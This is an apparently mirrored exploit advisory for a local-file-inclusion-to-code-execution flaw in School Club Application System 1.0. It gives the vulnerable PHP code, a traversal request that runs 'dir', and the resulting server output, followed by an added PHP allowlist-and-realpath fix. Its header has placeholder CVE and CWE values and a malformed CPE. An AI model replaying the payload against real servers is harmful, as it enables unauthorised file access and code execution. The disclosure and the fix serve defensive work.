School Club Application System 1.0 Local File Inclusion

CVE: CVE-XXXX-XXXX
Category: CWE-XX
Price: $500
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Local
Date: 2022-04-08
CPE: cpe:cpe:/a:school-club-application-system:1.0
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS: 0.0219
EPSSP: 0.34981


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022040033

Below is a copy:

School Club Application System 1.0 Local File Inclusion
# Title:  School Club Application System 1.0  LFI To RCE
# Author: Hejap Zairy
# Date: 08.04.2022
# Vendor: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html
# Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scas_0.zip
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache




# Vulnerable code (PHP)
The `page` value needs more filtering before it reaches require_once.

```
<?php 
require_once('config.php');
$page = isset($_GET['page']) ? $_GET['page'] : 'home';
$page_name = explode("/",$page)[count(explode("/",$page)) -1];
?>
```

[+] Payload GET


```
GET /scas/?page=../../0day&515=dir HTTP/1.1
Host: 0day.gov
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: ar,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=edh1ho9c9skog6v2ns0n0j3f2k
Connection: close


```


#Status: CRITICAL

#Response 
```
HTTP/1.1 200 OK
Date: Fri, 08 Apr 2022 04:05:58 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13563

</h1>
                        <p class="lead text-white mt-3">.. .. 0day Page</p>
                    </div>
                </div>
            </div>
        </div>
    </header>
    <div class="card card-body blur shadow-blur mx-3 mx-md-4 mt-n6">
                 Volume in drive C is OS
 Volume Serial Number is 2EF1-9DCA

 Directory of C:\xampp\htdocs\scas

04/08/2022  06:27 AM    <DIR>          .
04/08/2022  06:27 AM    <DIR>          ..
03/19/2021  01:17 PM               225 .htaccess
04/07/2022  10:03 AM             2,115 about.html
03/30/2022  04:31 PM               220 about.php
04/07/2022  03:56 PM    <DIR>          admin
04/08/2022  06:27 AM    <DIR>          assets
03/29/2022  04:17 PM    <DIR>          classes
04/07/2022  03:20 PM    <DIR>          clubs
04/07/2022  04:33 PM    <DIR>          club_admin
04/07/2022  02:39 PM    <DIR>          club_contents
03/30/2022  10:03 AM             1,297 config.php
04/07/2022  05:13 PM    <DIR>          database
03/30/2022  04:31 PM               256 home.php
03/29/2022  10:24 AM    <DIR>          includes
04/07/2022  03:18 PM             3,010 index.php
04/07/2022  09:35 AM               647 initialize.php
04/07/2022  08:18 AM    <DIR>          uploads
04/07/2022  10:03 AM             1,842 welcome.html
               8 File(s)          9,612 bytes
              11 Dir(s)  81,520,218,112 bytes free
    </div>

```



# Description:
Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server. If the included file is executed, the issue can be converted into remote code execution (RCE).
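
One way to add the filtering the advisory asks for, shown as an added example that is not part of the original advisory or the project's code: the `page` value must match a strict pattern and the resolved path must stay inside the pages directory. `resolve_page()`, the temporary directory layout and the assumption that pages are included as `<page>.php` are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example, not the project's code. resolve_page() is a hypothetical name.
// Assumption: the app includes "<page>.php" from a single pages directory.
function resolve_page(string $page, string $root): ?string
{
    // 1. Syntax allowlist: segments of [A-Za-z0-9_-] joined by "/".
    //    Rejects "..", backslashes, NUL bytes and wrappers such as "php://".
    if (!preg_match('#^[A-Za-z0-9_-]+(/[A-Za-z0-9_-]+)*$#D', $page)) {
        return null;
    }
    // 2. Canonicalise, then require the result to stay under the root.
    //    This also catches symlinks that point outside it.
    $rootReal = realpath($root);
    $target   = realpath($root . DIRECTORY_SEPARATOR . $page . '.php');
    if ($rootReal === false || $target === false) {
        return null;
    }
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    // strncmp() instead of str_starts_with() so this runs on PHP 7.4.
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($target) ? $target : null;
}

// Constructed demo: a throwaway web root with one page and a file two levels up.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'scas_demo_' . bin2hex(random_bytes(4));
$root = $base . '/a/webroot';
mkdir($root, 0700, true);
file_put_contents($root . '/home.php', '<?php echo "home";');
file_put_contents($base . '/0day.php', '<?php echo "outside";');

// Constructed inputs; the second is the page value from the request shown above.
$inputs = ['home', '../../0day', '..\\..\\0day', 'php://filter/resource=home', "home\0", 'missing'];
foreach ($inputs as $p) {
    $file = resolve_page($p, $root);
    printf("%-32s => %s\n", json_encode($p),
        $file === null ? 'rejected, serve 404' : 'include ' . basename($file));
}

// In the front controller: confirm is_string($_GET['page']) first, then
// require_once only the path that resolve_page() returned.
```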


# Proof and Exploit:
https://i.imgur.com/3MbzZuQ.png
https://i.imgur.com/mqXb1Mc.png
